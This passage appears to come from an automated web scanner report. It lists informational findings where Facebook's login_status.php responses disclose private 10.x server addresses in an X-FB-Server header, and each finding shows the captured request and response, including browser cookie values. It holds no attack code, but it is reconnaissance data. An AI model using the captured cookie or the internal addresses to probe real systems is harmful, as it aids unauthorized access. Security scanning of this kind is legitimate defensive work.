GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df198805454%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb647224%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df270d85334%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df346331d38%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df270d85334&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a28b168%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df270d85334&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a33feeb%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df270d85334&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.94.65
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:09 GMT
Content-Length: 22

Invalid Application ID

19.640. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.26.29

Request

Response

19.641. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.92.45

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b819646%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df188d79e54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c7865bc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df252fec73c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c7865bc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eb7b3e18%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c7865bc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df263dbf564%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c7865bc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.92.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:49 GMT
Content-Length: 22

Invalid Application ID

19.642. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.226.127

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff1028d1c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfeed3c88%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c8923b6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c9085fd8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c8923b6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16a5d82c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c8923b6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3abeb3764%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c8923b6c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.127
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:01 GMT
Content-Length: 22

Invalid Application ID

19.643. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.32

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe05f8e7c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df145a3c044%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3426314e4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19def223%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3426314e4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5c782024%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3426314e4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df256bb095%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3426314e4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.32
X-Cnection: close
Date: Thu, 16 Jun 2011 19:08:55 GMT
Content-Length: 22

Invalid Application ID

19.644. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.81.37

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa447788%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1396134d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc4d3f73c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28f76bd64%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc4d3f73c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2859999f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc4d3f73c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bd16c504%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc4d3f73c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.81.37
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:57 GMT
Content-Length: 22

Invalid Application ID

19.645. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.234.64

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df220bd8c04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c50a4bec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5223c0%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffa9dd06%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5223c0&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a0333dc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5223c0&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337612bd4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c5223c0&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.234.64
X-Cnection: close
Date: Thu, 16 Jun 2011 11:54:29 GMT
Content-Length: 22

Invalid Application ID

19.646. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.186.32

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df121df300c%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2395bd2e%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b1c11cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cad2faa%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b1c11cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b75b94%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b1c11cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bea493b4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1317e5bb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5b1c11cc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.186.32
X-Cnection: close
Date: Thu, 16 Jun 2011 11:24:11 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f162b75b94&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1317e5bb4&relation=parent&transport=postmessage&frame=f5b1c11cc", "http:\/\/
...[SNIP]...

19.647. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.38

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd4efba38%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b630347%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e63d36d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df360918274%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e63d36d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ce28f09c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e63d36d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f61edadc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e63d36d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.123.38
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:49 GMT
Content-Length: 22

Invalid Application ID

19.648. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.215.62

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df204386ae4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2994bb7d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df105c3783%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfca921a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df105c3783&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8ba8224%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df105c3783&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df125bfe1c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df105c3783&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.62
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:26 GMT
Content-Length: 22

Invalid Application ID

19.649. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.209.196

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a63eb35c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c69afae4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df61df62a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df51b59d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df61df62a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fa0aa9ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df61df62a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13b5d7154%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df61df62a8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.209.196
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:00 GMT
Content-Length: 22

Invalid Application ID

19.650. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.45

Request

